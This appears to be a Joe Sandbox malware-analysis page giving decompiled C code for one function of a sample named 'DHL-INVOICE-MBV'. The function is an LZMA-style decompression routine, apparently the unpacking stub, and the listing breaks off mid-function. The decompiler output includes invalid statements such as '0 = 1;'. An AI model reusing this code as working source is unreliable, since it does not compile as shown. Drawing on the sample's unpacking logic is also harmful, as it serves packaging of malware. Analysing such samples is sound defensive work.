Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d01b1c5effafd64d8cfad2db312f22eb5162b5418c1bb992621b7de497566ec4
Instruction ID: 21cf7db9f51931c48f99e7e9547f5b24ff728e46d141457ef608e09f17fb8729
Opcode Fuzzy Hash: d01b1c5effafd64d8cfad2db312f22eb5162b5418c1bb992621b7de497566ec4
Instruction Fuzzy Hash: 4C815571D04229DBDB24CFA9D8447ADBBB0FB44301F2081AEE456BB281C7786A86DF55

Uniqueness

Uniqueness Score: -1.00%

Function 00406C2D Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406C2D() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00407231))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4)); // executed
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8)); // executed
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
